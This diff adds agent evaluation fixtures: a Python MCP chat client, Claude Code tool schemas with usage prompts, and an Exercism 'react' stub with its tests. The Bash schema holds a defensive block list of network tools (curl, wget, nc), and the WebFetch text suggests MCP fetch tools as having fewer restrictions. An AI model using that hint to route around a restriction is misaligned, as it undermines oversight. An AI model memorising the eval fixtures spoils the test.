+ """ + url = "https://api.groq.com/openai/v1/chat/completions" + + headers = { + "Content-Type": "application/json", + "Authorization": f"Bearer {self.api_key}", + } + payload = { + "messages": messages, + "model": "llama-3.2-90b-vision-preview", + "temperature": 0.7, + "max_tokens": 4096, + "top_p": 1, + "stream": False, + "stop": None, + } + + try: + with httpx.Client() as client: + response = client.post(url, headers=headers, json=payload) + response.raise_for_status() + data = response.json() + return data["choices"][0]["message"]["content"] + + except httpx.RequestError as e: + error_message = f"Error getting LLM response: {str(e)}" + logging.error(error_message) + + if isinstance(e, httpx.HTTPStatusError): + status_code = e.response.status_code + logging.error(f"Status code: {status_code}") + logging.error(f"Response details: {e.response.text}") + + return ( + f"I encountered an error: {error_message}. " + "Please try again or rephrase your request." + ) + + +class ChatSession: + """Orchestrates the interaction between user, LLM, and tools.""" + + def __init__(self, servers: list[Server], llm_client: LLMClient) -> None: + self.servers: list[Server] = servers + self.llm_client: LLMClient = llm_client + + async def cleanup_servers(self) -> None: + """Clean up all servers properly.""" + cleanup_tasks = [] + for server in self.servers: + cleanup_tasks.append(asyncio.create_task(server.cleanup())) + + if cleanup_tasks: + try: + await asyncio.gather(*cleanup_tasks, return_exceptions=True) + except Exception as e: + logging.warning(f"Warning during final cleanup: {e}") + + async def process_llm_response(self, llm_response: str) -> str: + """Process the LLM response and execute tools if needed. + + Args: + llm_response: The response from the LLM. + + Returns: + The result of tool execution or the original response. 
+ """ + import json + + try: + tool_call = json.loads(llm_response) + if "tool" in tool_call and "arguments" in tool_call: + logging.info(f"Executing tool: {tool_call['tool']}") + logging.info(f"With arguments: {tool_call['arguments']}") + + for server in self.servers: + tools = await server.list_tools() + if any(tool.name == tool_call["tool"] for tool in tools): + try: + result = await server.execute_tool( + tool_call["tool"], tool_call["arguments"] + ) + + if isinstance(result, dict) and "progress" in result: + progress = result["progress"] + total = result["total"] + percentage = (progress / total) * 100 + logging.info( + f"Progress: {progress}/{total} " + f"({percentage:.1f}%)" + ) + + return f"Tool execution result: {result}" + except Exception as e: + error_msg = f"Error executing tool: {str(e)}" + logging.error(error_msg) + return error_msg + + return f"No server found with tool: {tool_call['tool']}" + return llm_response + except json.JSONDecodeError: + return llm_response + + async def start(self) -> None: + """Main chat session handler.""" + try: + for server in self.servers: + try: + await server.initialize() + except Exception as e: + logging.error(f"Failed to initialize server: {e}") + await self.cleanup_servers() + return + + all_tools = [] + for server in self.servers: + tools = await server.list_tools() + all_tools.extend(tools) + + tools_description = "\n".join([tool.format_for_llm() for tool in all_tools]) + + system_message = ( + "You are a helpful assistant with access to these tools:\n\n" + f"{tools_description}\n" + "Choose the appropriate tool based on the user's question. " + "If no tool is needed, reply directly.\n\n" + "IMPORTANT: When you need to use a tool, you must ONLY respond with " + "the exact JSON object format below, nothing else:\n" + "{\n" + ' "tool": "tool-name",\n' + ' "arguments": {\n' + ' "argument-name": "value"\n' + " }\n" + "}\n\n" + "After receiving a tool's response:\n" + "1. 
Transform the raw data into a natural, conversational response\n" + "2. Keep responses concise but informative\n" + "3. Focus on the most relevant information\n" + "4. Use appropriate context from the user's question\n" + "5. Avoid simply repeating the raw data\n\n" + "Please use only the tools that are explicitly defined above." + ) + + messages = [{"role": "system", "content": system_message}] + + while True: + try: + user_input = input("You: ").strip().lower() + if user_input in ["quit", "exit"]: + logging.info("\nExiting...") + break + + messages.append({"role": "user", "content": user_input}) + + llm_response = self.llm_client.get_response(messages) + logging.info("\nAssistant: %s", llm_response) + + result = await self.process_llm_response(llm_response) + + if result != llm_response: + messages.append({"role": "assistant", "content": llm_response}) + messages.append({"role": "system", "content": result}) + + final_response = self.llm_client.get_response(messages) + logging.info("\nFinal response: %s", final_response) + messages.append( + {"role": "assistant", "content": final_response} + ) + else: + messages.append({"role": "assistant", "content": llm_response}) + + except KeyboardInterrupt: + logging.info("\nExiting...") + break + + finally: + await self.cleanup_servers() + + +async def main() -> None: + """Initialize and run the chat session.""" + config = Configuration() + server_config = config.load_config("servers_config.json") + servers = [ + Server(name, srv_config) + for name, srv_config in server_config["mcpServers"].items() + ] + llm_client = LLMClient(config.llm_api_key) + chat_session = ChatSession(servers, llm_client) + await chat_session.start() + + +if __name__ == "__main__": + asyncio.run(main()) +``` + + + + +JSON schema for Claude Code tools available via MCP: +```json +{ + "jsonrpc": "2.0", + "id": 1, + "result": { + "tools": [ + { + "name": "dispatch_agent", + "description": "Launch a new task", + "inputSchema": { + "type": "object", + 
"properties": { + "prompt": { + "type": "string", + "description": "The task for the agent to perform" + } + }, + "required": [ + "prompt" + ], + "additionalProperties": false, + "$schema": "http://json-schema.org/draft-07/schema#" + } + }, + { + "name": "Bash", + "description": "Run shell command", + "inputSchema": { + "type": "object", + "properties": { + "command": { + "type": "string", + "description": "The command to execute" + }, + "timeout": { + "type": "number", + "description": "Optional timeout in milliseconds (max 600000)" + }, + "description": { + "type": "string", + "description": " Clear, concise description of what this command does in 5-10 words. Examples:\nInput: ls\nOutput: Lists files in current directory\n\nInput: git status\nOutput: Shows working tree status\n\nInput: npm install\nOutput: Installs package dependencies\n\nInput: mkdir foo\nOutput: Creates directory 'foo'" + } + }, + "required": [ + "command" + ], + "additionalProperties": false, + "$schema": "http://json-schema.org/draft-07/schema#" + } + }, + { + "name": "BatchTool", + "description": "\n- Batch execution tool that runs multiple tool invocations in a single request\n- Tools are executed in parallel when possible, and otherwise serially\n- Takes a list of tool invocations (tool_name and input pairs)\n- Returns the collected results from all invocations\n- Use this tool when you need to run multiple independent tool operations at once -- it is awesome for speeding up your workflow, reducing both context usage and latency\n- Each tool will respect its own permissions and validation rules\n- The tool's outputs are NOT shown to the user; to answer the user's query, you MUST send a message with the results after the tool call completes, otherwise the user will not see the results\n\nAvailable tools:\nTool: dispatch_agent\nArguments: prompt: string \"The task for the agent to perform\"\nUsage: Launch a new agent that has access to the following tools: View, GlobTool, GrepTool, LS, 
ReadNotebook, WebFetchTool. When you are searching for a keyword or file and are not confident that you will find the right match in the first few tries, use the Agent tool to perform the search for you.\n\nWhen to use the Agent tool:\n- If you are searching for a keyword like \"config\" or \"logger\", or for questions like \"which file does X?\", the Agent tool is strongly recommended\n\nWhen NOT to use the Agent tool:\n- If you want to read a specific file path, use the View or GlobTool tool instead of the Agent tool, to find the match more quickly\n- If you are searching for a specific class definition like \"class Foo\", use the GlobTool tool instead, to find the match more quickly\n- If you are searching for code within a specific file or set of 2-3 files, use the View tool instead of the Agent tool, to find the match more quickly\n\nUsage notes:\n1. Launch multiple agents concurrently whenever possible, to maximize performance; to do that, use a single message with multiple tool uses\n2. When the agent is done, it will return a single message back to you. The result returned by the agent is not visible to the user. To show the user the result, you should send a text message back to the user with a concise summary of the result.\n3. Each agent invocation is stateless. You will not be able to send additional messages to the agent, nor will the agent be able to communicate with you outside of its final report. Therefore, your prompt should contain a highly detailed task description for the agent to perform autonomously and you should specify exactly what information the agent should return back to you in its final and only message to you.\n4. The agent's outputs should generally be trusted\n5. IMPORTANT: The agent can not use Bash, Replace, Edit, NotebookEditCell, so can not modify files. 
If you want to use these tools, use them directly instead of going through the agent.\n---Tool: Bash\nArguments: command: string \"The command to execute\", [optional] timeout: number \"Optional timeout in milliseconds (max 600000)\", [optional] description: string \" Clear, concise description of what this command does in 5-10 words. Examples:\nInput: ls\nOutput: Lists files in current directory\n\nInput: git status\nOutput: Shows working tree status\n\nInput: npm install\nOutput: Installs package dependencies\n\nInput: mkdir foo\nOutput: Creates directory 'foo'\"\nUsage: Executes a given bash command in a persistent shell session with optional timeout, ensuring proper handling and security measures.\n\nBefore executing the command, please follow these steps:\n\n1. Directory Verification:\n - If the command will create new directories or files, first use the LS tool to verify the parent directory exists and is the correct location\n - For example, before running \"mkdir foo/bar\", first use LS to check that \"foo\" exists and is the intended parent directory\n\n2. Security Check:\n - For security and to limit the threat of a prompt injection attack, some commands are limited or banned. If you use a disallowed command, you will receive an error message explaining the restriction. Explain the error to the User.\n - Verify that the command is not one of the banned commands: alias, curl, curlie, wget, axel, aria2c, nc, telnet, lynx, w3m, links, httpie, xh, http-prompt, chrome, firefox, safari.\n\n3. Command Execution:\n - After ensuring proper quoting, execute the command.\n - Capture the output of the command.\n\nUsage notes:\n - The command argument is required.\n - You can specify an optional timeout in milliseconds (up to 600000ms / 10 minutes). 
If not specified, commands will timeout after 30 minutes.\n - It is very helpful if you write a clear, concise description of what this command does in 5-10 words.\n - If the output exceeds 30000 characters, output will be truncated before being returned to you.\n - VERY IMPORTANT: You MUST avoid using search commands like `find` and `grep`. Instead use GrepTool, GlobTool, or dispatch_agent to search. You MUST avoid read tools like `cat`, `head`, `tail`, and `ls`, and use View and LS to read files.\n - When issuing multiple commands, use the ';' or '&&' operator to separate them. DO NOT use newlines (newlines are ok in quoted strings).\n - Try to maintain your current working directory throughout the session by using absolute paths and avoiding usage of `cd`. You may use `cd` if the User explicitly requests it.\n \n pytest /foo/bar/tests\n \n \n cd /foo/bar && pytest tests\n \n\n# Committing changes with git\n\nWhen the user asks you to create a new git commit, follow these steps carefully:\n\n1. Use BatchTool to run the following commands in parallel:\n - Run a git status command to see all untracked files.\n - Run a git diff command to see both staged and unstaged changes that will be committed.\n - Run a git log command to see recent commit messages, so that you can follow this repository's commit message style.\n\n2. Analyze all staged changes (both previously staged and newly added) and draft a commit message. Wrap your analysis process in tags:\n\n\n- List the files that have been changed or added\n- Summarize the nature of the changes (eg. 
new feature, enhancement to an existing feature, bug fix, refactoring, test, docs, etc.)\n- Brainstorm the purpose or motivation behind these changes\n- Assess the impact of these changes on the overall project\n- Check for any sensitive information that shouldn't be committed\n- Draft a concise (1-2 sentences) commit message that focuses on the \"why\" rather than the \"what\"\n- Ensure your language is clear, concise, and to the point\n- Ensure the message accurately reflects the changes and their purpose (i.e. \"add\" means a wholly new feature, \"update\" means an enhancement to an existing feature, \"fix\" means a bug fix, etc.)\n- Ensure the message is not generic (avoid words like \"Update\" or \"Fix\" without context)\n- Review the draft message to ensure it accurately reflects the changes and their purpose\n\n\n3. Use BatchTool to run the following commands in parallel:\n - Add relevant untracked files to the staging area.\n - Create the commit with a message ending with:\n 🤖 Generated with [Claude Code](https://claude.ai/code)\n\n Co-Authored-By: Claude \n - Run git status to make sure the commit succeeded.\n\n4. If the commit fails due to pre-commit hook changes, retry the commit ONCE to include these automated changes. If it fails again, it usually means a pre-commit hook is preventing the commit. If the commit succeeds but you notice that files were modified by the pre-commit hook, you MUST amend your commit to include them.\n\nImportant notes:\n- Use the git context at the start of this conversation to determine which files are relevant to your commit. Be careful not to stage and commit files (e.g. 
with `git add .`) that aren't relevant to your commit.\n- NEVER update the git config\n- DO NOT run additional commands to read or explore code, beyond what is available in the git context\n- DO NOT push to the remote repository\n- IMPORTANT: Never use git commands with the -i flag (like git rebase -i or git add -i) since they require interactive input which is not supported.\n- If there are no changes to commit (i.e., no untracked files and no modifications), do not create an empty commit\n- Ensure your commit message is meaningful and concise. It should explain the purpose of the changes, not just describe them.\n- Return an empty response - the user will see the git output directly\n- In order to ensure good formatting, ALWAYS pass the commit message via a HEREDOC, a la this example:\n\ngit commit -m \"$(cat <<'EOF'\n Commit message here.\n\n 🤖 Generated with [Claude Code](https://claude.ai/code)\n\n Co-Authored-By: Claude \n EOF\n )\"\n\n\n# Creating pull requests\nUse the gh command via the Bash tool for ALL GitHub-related tasks including working with issues, pull requests, checks, and releases. If given a Github URL use the gh command to get the information needed.\n\nIMPORTANT: When the user asks you to create a pull request, follow these steps carefully:\n\n1. Use BatchTool to run the following commands in parallel, in order to understand the current state of the branch since it diverged from the main branch:\n - Run a git status command to see all untracked files\n - Run a git diff command to see both staged and unstaged changes that will be committed\n - Check if the current branch tracks a remote branch and is up to date with the remote, so you know if you need to push to the remote\n - Run a git log command and `git diff main...HEAD` to understand the full commit history for the current branch (from the time it diverged from the `main` branch)\n\n2. 
Analyze all changes that will be included in the pull request, making sure to look at all relevant commits (NOT just the latest commit, but ALL commits that will be included in the pull request!!!), and draft a pull request summary. Wrap your analysis process in tags:\n\n\n- List the commits since diverging from the main branch\n- Summarize the nature of the changes (eg. new feature, enhancement to an existing feature, bug fix, refactoring, test, docs, etc.)\n- Brainstorm the purpose or motivation behind these changes\n- Assess the impact of these changes on the overall project\n- Do not use tools to explore code, beyond what is available in the git context\n- Check for any sensitive information that shouldn't be committed\n- Draft a concise (1-2 bullet points) pull request summary that focuses on the \"why\" rather than the \"what\"\n- Ensure the summary accurately reflects all changes since diverging from the main branch\n- Ensure your language is clear, concise, and to the point\n- Ensure the summary accurately reflects the changes and their purpose (ie. \"add\" means a wholly new feature, \"update\" means an enhancement to an existing feature, \"fix\" means a bug fix, etc.)\n- Ensure the summary is not generic (avoid words like \"Update\" or \"Fix\" without context)\n- Review the draft summary to ensure it accurately reflects the changes and their purpose\n\n\n3. Use BatchTool to run the following commands in parallel:\n - Create new branch if needed\n - Push to remote with -u flag if needed\n - Create PR using gh pr create with the format below. 
Use a HEREDOC to pass the body to ensure correct formatting.\n\ngh pr create --title \"the pr title\" --body \"$(cat <<'EOF'\n## Summary\n<1-3 bullet points>\n\n## Test plan\n[Checklist of TODOs for testing the pull request...]\n\n🤖 Generated with [Claude Code](https://claude.ai/code)\nEOF\n)\"\n\n\nImportant:\n- NEVER update the git config\n- Return an empty response - the user will see the gh output directly\n\n# Other common operations\n- View comments on a Github PR: gh api repos/foo/bar/pulls/123/comments\n---Tool: GlobTool\nArguments: pattern: string \"The glob pattern to match files against\", [optional] path: string \"The directory to search in. If not specified, the current working directory will be used. IMPORTANT: Omit this field to use the default directory. DO NOT enter \"undefined\" or \"null\" - simply omit it for the default behavior. Must be a valid directory path if provided.\"\nUsage: - Fast file pattern matching tool that works with any codebase size\n- Supports glob patterns like \"**/*.js\" or \"src/**/*.ts\"\n- Returns matching file paths sorted by modification time\n- Use this tool when you need to find files by name patterns\n- When you are doing an open ended search that may require multiple rounds of globbing and grepping, use the Agent tool instead\n\n---Tool: GrepTool\nArguments: pattern: string \"The regular expression pattern to search for in file contents\", [optional] path: string \"The directory to search in. Defaults to the current working directory.\", [optional] include: string \"File pattern to include in the search (e.g. \"*.js\", \"*.{ts,tsx}\")\"\nUsage: \n- Fast content search tool that works with any codebase size\n- Searches file contents using regular expressions\n- Supports full regex syntax (eg. \"log.*Error\", \"function\\s+\\w+\", etc.)\n- Filter files by pattern with the include parameter (eg. 
\"*.js\", \"*.{ts,tsx}\")\n- Returns matching file paths sorted by modification time\n- Use this tool when you need to find files containing specific patterns\n- When you are doing an open ended search that may require multiple rounds of globbing and grepping, use the Agent tool instead\n\n---Tool: LS\nArguments: path: string \"The absolute path to the directory to list (must be absolute, not relative)\", [optional] ignore: array \"List of glob patterns to ignore\"\nUsage: Lists files and directories in a given path. The path parameter must be an absolute path, not a relative path. You can optionally provide an array of glob patterns to ignore with the ignore parameter. You should generally prefer the Glob and Grep tools, if you know which directories to search.\n---Tool: View\nArguments: file_path: string \"The absolute path to the file to read\", [optional] offset: number \"The line number to start reading from. Only provide if the file is too large to read at once\", [optional] limit: number \"The number of lines to read. Only provide if the file is too large to read at once.\"\nUsage: Reads a file from the local filesystem. You can access any file directly by using this tool.\nAssume this tool is able to read all files on the machine. If the User provides a path to a file assume that path is valid. It is okay to read a file that does not exist; an error will be returned.\n\nUsage:\n- The file_path parameter must be an absolute path, not a relative path\n- By default, it reads up to 2000 lines starting from the beginning of the file\n- You can optionally specify a line offset and limit (especially handy for long files), but it's recommended to read the whole file by not providing these parameters\n- Any lines longer than 2000 characters will be truncated\n- Results are returned using cat -n format, with line numbers starting at 1\n- This tool allows Claude Code to VIEW images (eg PNG, JPG, etc). 
When reading an image file the contents are presented visually as Claude Code is a multimodal LLM.\n- For Jupyter notebooks (.ipynb files), use the ReadNotebook instead\n- When reading multiple files, you MUST use the BatchTool tool to read them all at once\n---Tool: Edit\nArguments: file_path: string \"The absolute path to the file to modify\", old_string: string \"The text to replace\", new_string: string \"The text to replace it with\", [optional] expected_replacements: number \"The expected number of replacements to perform. Defaults to 1 if not specified.\"\nUsage: This is a tool for editing files. For moving or renaming files, you should generally use the Bash tool with the 'mv' command instead. For larger edits, use the Write tool to overwrite files. For Jupyter notebooks (.ipynb files), use the NotebookEditCell instead.\n\nBefore using this tool:\n\n1. Use the View tool to understand the file's contents and context\n\n2. Verify the directory path is correct (only applicable when creating new files):\n - Use the LS tool to verify the parent directory exists and is the correct location\n\nTo make a file edit, provide the following:\n1. file_path: The absolute path to the file to modify (must be absolute, not relative)\n2. old_string: The text to replace (must match the file contents exactly, including all whitespace and indentation)\n3. new_string: The edited text to replace the old_string\n4. expected_replacements: The number of replacements you expect to make. Defaults to 1 if not specified.\n\nBy default, the tool will replace ONE occurrence of old_string with new_string in the specified file. If you want to replace multiple occurrences, provide the expected_replacements parameter with the exact number of occurrences you expect.\n\nCRITICAL REQUIREMENTS FOR USING THIS TOOL:\n\n1. UNIQUENESS (when expected_replacements is not specified): The old_string MUST uniquely identify the specific instance you want to change. 
This means:\n - Include AT LEAST 3-5 lines of context BEFORE the change point\n - Include AT LEAST 3-5 lines of context AFTER the change point\n - Include all whitespace, indentation, and surrounding code exactly as it appears in the file\n\n2. EXPECTED MATCHES: If you want to replace multiple instances:\n - Use the expected_replacements parameter with the exact number of occurrences you expect to replace\n - This will replace ALL occurrences of the old_string with the new_string\n - If the actual number of matches doesn't equal expected_replacements, the edit will fail\n - This is a safety feature to prevent unintended replacements\n\n3. VERIFICATION: Before using this tool:\n - Check how many instances of the target text exist in the file\n - If multiple instances exist, either:\n a) Gather enough context to uniquely identify each one and make separate calls, OR\n b) Use expected_replacements parameter with the exact count of instances you expect to replace\n\nWARNING: If you do not follow these requirements:\n - The tool will fail if old_string matches multiple locations and expected_replacements isn't specified\n - The tool will fail if the number of matches doesn't equal expected_replacements when it's specified\n - The tool will fail if old_string doesn't match exactly (including whitespace)\n - You may change unintended instances if you don't verify the match count\n\nWhen making edits:\n - Ensure the edit results in idiomatic, correct code\n - Do not leave the code in a broken state\n - Always use absolute file paths (starting with /)\n\nIf you want to create a new file, use:\n - A new file path, including dir name if needed\n - An empty old_string\n - The new file's contents as new_string\n\nRemember: when making multiple file edits in a row to the same file, you should prefer to send all edits in a single message with multiple calls to this tool, rather than multiple messages with a single call each.\n\n---Tool: Replace\nArguments: file_path: string \"The 
absolute path to the file to write (must be absolute, not relative)\", content: string \"The content to write to the file\"\nUsage: Write a file to the local filesystem. Overwrites the existing file if there is one.\n\nBefore using this tool:\n\n1. Use the ReadFile tool to understand the file's contents and context\n\n2. Directory Verification (only applicable when creating new files):\n - Use the LS tool to verify the parent directory exists and is the correct location\n---Tool: ReadNotebook\nArguments: notebook_path: string \"The absolute path to the Jupyter notebook file to read (must be absolute, not relative)\"\nUsage: Reads a Jupyter notebook (.ipynb file) and returns all of the cells with their outputs. Jupyter notebooks are interactive documents that combine code, text, and visualizations, commonly used for data analysis and scientific computing. The notebook_path parameter must be an absolute path, not a relative path.\n---Tool: NotebookEditCell\nArguments: notebook_path: string \"The absolute path to the Jupyter notebook file to edit (must be absolute, not relative)\", cell_number: number \"The index of the cell to edit (0-based)\", new_source: string \"The new source for the cell\", [optional] cell_type: string \"The type of the cell (code or markdown). If not specified, it defaults to the current cell type. If using edit_mode=insert, this is required.\", [optional] edit_mode: string \"The type of edit to make (replace, insert, delete). Defaults to replace.\"\nUsage: Completely replaces the contents of a specific cell in a Jupyter notebook (.ipynb file) with new source. Jupyter notebooks are interactive documents that combine code, text, and visualizations, commonly used for data analysis and scientific computing. The notebook_path parameter must be an absolute path, not a relative path. The cell_number is 0-indexed. Use edit_mode=insert to add a new cell at the index specified by cell_number. 
Use edit_mode=delete to delete the cell at the index specified by cell_number.\n---Tool: WebFetchTool\nArguments: url: string \"The URL to fetch content from\", prompt: string \"The prompt to run on the fetched content\"\nUsage: \n- Fetches content from a specified URL and processes it using an AI model\n- Takes a URL and a prompt as input\n- Fetches the URL content, converts HTML to markdown\n- Processes the content with the prompt using a small, fast model\n- Returns the model's response about the content\n- Use this tool when you need to retrieve and analyze web content\n\nUsage notes:\n - IMPORTANT: If an MCP-provided web fetch tool is available, prefer using that tool instead of this one, as it may have fewer restrictions. All MCP-provided tools start with \"mcp__\".\n - The URL must be a fully-formed valid URL\n - HTTP URLs will be automatically upgraded to HTTPS\n - For security reasons, the URL's domain must have been provided directly by the user, unless it's on a small pre-approved set of the top few dozen hosts for popular coding resources, like react.dev.\n - The prompt should describe what information you want to extract from the page\n - This tool is read-only and does not modify any files\n - Results may be summarized if the content is very large\n - Includes a self-cleaning 15-minute cache for faster responses when repeatedly accessing the same URL\n\n\nExample usage:\n{\n \"invocations\": [\n {\n \"tool_name\": \"Bash\",\n \"input\": {\n \"command\": \"git blame src/foo.ts\"\n }\n },\n {\n \"tool_name\": \"GlobTool\",\n \"input\": {\n \"pattern\": \"**/*.ts\"\n }\n },\n {\n \"tool_name\": \"GrepTool\",\n \"input\": {\n \"pattern\": \"function\",\n \"include\": \"*.ts\"\n }\n }\n ]\n}\n", + "inputSchema": { + "type": "object", + "properties": { + "description": { + "type": "string", + "description": "A short (3-5 word) description of the batch operation" + }, + "invocations": { + "type": "array", + "items": { + "type": "object", + "properties": { + 
"tool_name": { + "type": "string", + "description": "The name of the tool to invoke" + }, + "input": { + "type": "object", + "additionalProperties": {}, + "description": "The input to pass to the tool" + } + }, + "required": [ + "tool_name", + "input" + ], + "additionalProperties": false + }, + "description": "The list of tool invocations to execute" + } + }, + "required": [ + "description", + "invocations" + ], + "additionalProperties": false, + "$schema": "http://json-schema.org/draft-07/schema#" + } + }, + { + "name": "GlobTool", + "description": "- Fast file pattern matching tool that works with any codebase size\n- Supports glob patterns like \"**/*.js\" or \"src/**/*.ts\"\n- Returns matching file paths sorted by modification time\n- Use this tool when you need to find files by name patterns\n- When you are doing an open ended search that may require multiple rounds of globbing and grepping, use the Agent tool instead\n", + "inputSchema": { + "type": "object", + "properties": { + "pattern": { + "type": "string", + "description": "The glob pattern to match files against" + }, + "path": { + "type": "string", + "description": "The directory to search in. If not specified, the current working directory will be used. IMPORTANT: Omit this field to use the default directory. DO NOT enter \"undefined\" or \"null\" - simply omit it for the default behavior. Must be a valid directory path if provided." + } + }, + "required": [ + "pattern" + ], + "additionalProperties": false, + "$schema": "http://json-schema.org/draft-07/schema#" + } + }, + { + "name": "GrepTool", + "description": "\n- Fast content search tool that works with any codebase size\n- Searches file contents using regular expressions\n- Supports full regex syntax (eg. \"log.*Error\", \"function\\s+\\w+\", etc.)\n- Filter files by pattern with the include parameter (eg. 
\"*.js\", \"*.{ts,tsx}\")\n- Returns matching file paths sorted by modification time\n- Use this tool when you need to find files containing specific patterns\n- When you are doing an open ended search that may require multiple rounds of globbing and grepping, use the Agent tool instead\n", + "inputSchema": { + "type": "object", + "properties": { + "pattern": { + "type": "string", + "description": "The regular expression pattern to search for in file contents" + }, + "path": { + "type": "string", + "description": "The directory to search in. Defaults to the current working directory." + }, + "include": { + "type": "string", + "description": "File pattern to include in the search (e.g. \"*.js\", \"*.{ts,tsx}\")" + } + }, + "required": [ + "pattern" + ], + "additionalProperties": false, + "$schema": "http://json-schema.org/draft-07/schema#" + } + }, + { + "name": "LS", + "description": "Lists files and directories in a given path. The path parameter must be an absolute path, not a relative path. You can optionally provide an array of glob patterns to ignore with the ignore parameter. You should generally prefer the Glob and Grep tools, if you know which directories to search.", + "inputSchema": { + "type": "object", + "properties": { + "path": { + "type": "string", + "description": "The absolute path to the directory to list (must be absolute, not relative)" + }, + "ignore": { + "type": "array", + "items": { + "type": "string" + }, + "description": "List of glob patterns to ignore" + } + }, + "required": [ + "path" + ], + "additionalProperties": false, + "$schema": "http://json-schema.org/draft-07/schema#" + } + }, + { + "name": "View", + "description": "Read a file from the local filesystem.", + "inputSchema": { + "type": "object", + "properties": { + "file_path": { + "type": "string", + "description": "The absolute path to the file to read" + }, + "offset": { + "type": "number", + "description": "The line number to start reading from. 
Only provide if the file is too large to read at once" + }, + "limit": { + "type": "number", + "description": "The number of lines to read. Only provide if the file is too large to read at once." + } + }, + "required": [ + "file_path" + ], + "additionalProperties": false, + "$schema": "http://json-schema.org/draft-07/schema#" + } + }, + { + "name": "Edit", + "description": "A tool for editing files", + "inputSchema": { + "type": "object", + "properties": { + "file_path": { + "type": "string", + "description": "The absolute path to the file to modify" + }, + "old_string": { + "type": "string", + "description": "The text to replace" + }, + "new_string": { + "type": "string", + "description": "The text to replace it with" + }, + "expected_replacements": { + "type": "number", + "default": 1, + "description": "The expected number of replacements to perform. Defaults to 1 if not specified." + } + }, + "required": [ + "file_path", + "old_string", + "new_string" + ], + "additionalProperties": false, + "$schema": "http://json-schema.org/draft-07/schema#" + } + }, + { + "name": "Replace", + "description": "Write a file to the local filesystem.", + "inputSchema": { + "type": "object", + "properties": { + "file_path": { + "type": "string", + "description": "The absolute path to the file to write (must be absolute, not relative)" + }, + "content": { + "type": "string", + "description": "The content to write to the file" + } + }, + "required": [ + "file_path", + "content" + ], + "additionalProperties": false, + "$schema": "http://json-schema.org/draft-07/schema#" + } + }, + { + "name": "ReadNotebook", + "description": "Extract and read source code from all code cells in a Jupyter notebook.", + "inputSchema": { + "type": "object", + "properties": { + "notebook_path": { + "type": "string", + "description": "The absolute path to the Jupyter notebook file to read (must be absolute, not relative)" + } + }, + "required": [ + "notebook_path" + ], + "additionalProperties": false, + 
"$schema": "http://json-schema.org/draft-07/schema#" + } + }, + { + "name": "NotebookEditCell", + "description": "Replace the contents of a specific cell in a Jupyter notebook.", + "inputSchema": { + "type": "object", + "properties": { + "notebook_path": { + "type": "string", + "description": "The absolute path to the Jupyter notebook file to edit (must be absolute, not relative)" + }, + "cell_number": { + "type": "number", + "description": "The index of the cell to edit (0-based)" + }, + "new_source": { + "type": "string", + "description": "The new source for the cell" + }, + "cell_type": { + "type": "string", + "enum": [ + "code", + "markdown" + ], + "description": "The type of the cell (code or markdown). If not specified, it defaults to the current cell type. If using edit_mode=insert, this is required." + }, + "edit_mode": { + "type": "string", + "description": "The type of edit to make (replace, insert, delete). Defaults to replace." + } + }, + "required": [ + "notebook_path", + "cell_number", + "new_source" + ], + "additionalProperties": false, + "$schema": "http://json-schema.org/draft-07/schema#" + } + }, + { + "name": "WebFetchTool", + "description": "Claude wants to fetch content from this URL", + "inputSchema": { + "type": "object", + "properties": { + "url": { + "type": "string", + "format": "uri", + "description": "The URL to fetch content from" + }, + "prompt": { + "type": "string", + "description": "The prompt to run on the fetched content" + } + }, + "required": [ + "url", + "prompt" + ], + "additionalProperties": false, + "$schema": "http://json-schema.org/draft-07/schema#" + } + } + ] + } +} +``` diff --git a/crates/agent/src/tools/evals/fixtures/zode/react.py b/crates/agent/src/tools/evals/fixtures/zode/react.py new file mode 100644 index 0000000000000000000000000000000000000000..03ff02e7891449fe2f3b45357a72410772276a0d --- /dev/null +++ b/crates/agent/src/tools/evals/fixtures/zode/react.py @@ -0,0 +1,14 @@ +class InputCell: + def __init__(self, 
initial_value): + self.value = None + + +class ComputeCell: + def __init__(self, inputs, compute_function): + self.value = None + + def add_callback(self, callback): + pass + + def remove_callback(self, callback): + pass diff --git a/crates/agent/src/tools/evals/fixtures/zode/react_test.py b/crates/agent/src/tools/evals/fixtures/zode/react_test.py new file mode 100644 index 0000000000000000000000000000000000000000..1f917e40b4167ed78c24b63151a2469f587bbda4 --- /dev/null +++ b/crates/agent/src/tools/evals/fixtures/zode/react_test.py @@ -0,0 +1,271 @@ +# These tests are auto-generated with test data from: +# https://github.com/exercism/problem-specifications/tree/main/exercises/react/canonical-data.json +# File last updated on 2023-07-19 + +from functools import partial +import unittest + +from react import ( + InputCell, + ComputeCell, +) + + +class ReactTest(unittest.TestCase): + def test_input_cells_have_a_value(self): + input = InputCell(10) + self.assertEqual(input.value, 10) + + def test_an_input_cell_s_value_can_be_set(self): + input = InputCell(4) + input.value = 20 + self.assertEqual(input.value, 20) + + def test_compute_cells_calculate_initial_value(self): + input = InputCell(1) + output = ComputeCell( + [ + input, + ], + lambda inputs: inputs[0] + 1, + ) + self.assertEqual(output.value, 2) + + def test_compute_cells_take_inputs_in_the_right_order(self): + one = InputCell(1) + two = InputCell(2) + output = ComputeCell( + [ + one, + two, + ], + lambda inputs: inputs[0] + inputs[1] * 10, + ) + self.assertEqual(output.value, 21) + + def test_compute_cells_update_value_when_dependencies_are_changed(self): + input = InputCell(1) + output = ComputeCell( + [ + input, + ], + lambda inputs: inputs[0] + 1, + ) + input.value = 3 + self.assertEqual(output.value, 4) + + def test_compute_cells_can_depend_on_other_compute_cells(self): + input = InputCell(1) + times_two = ComputeCell( + [ + input, + ], + lambda inputs: inputs[0] * 2, + ) + times_thirty = ComputeCell( + [ + 
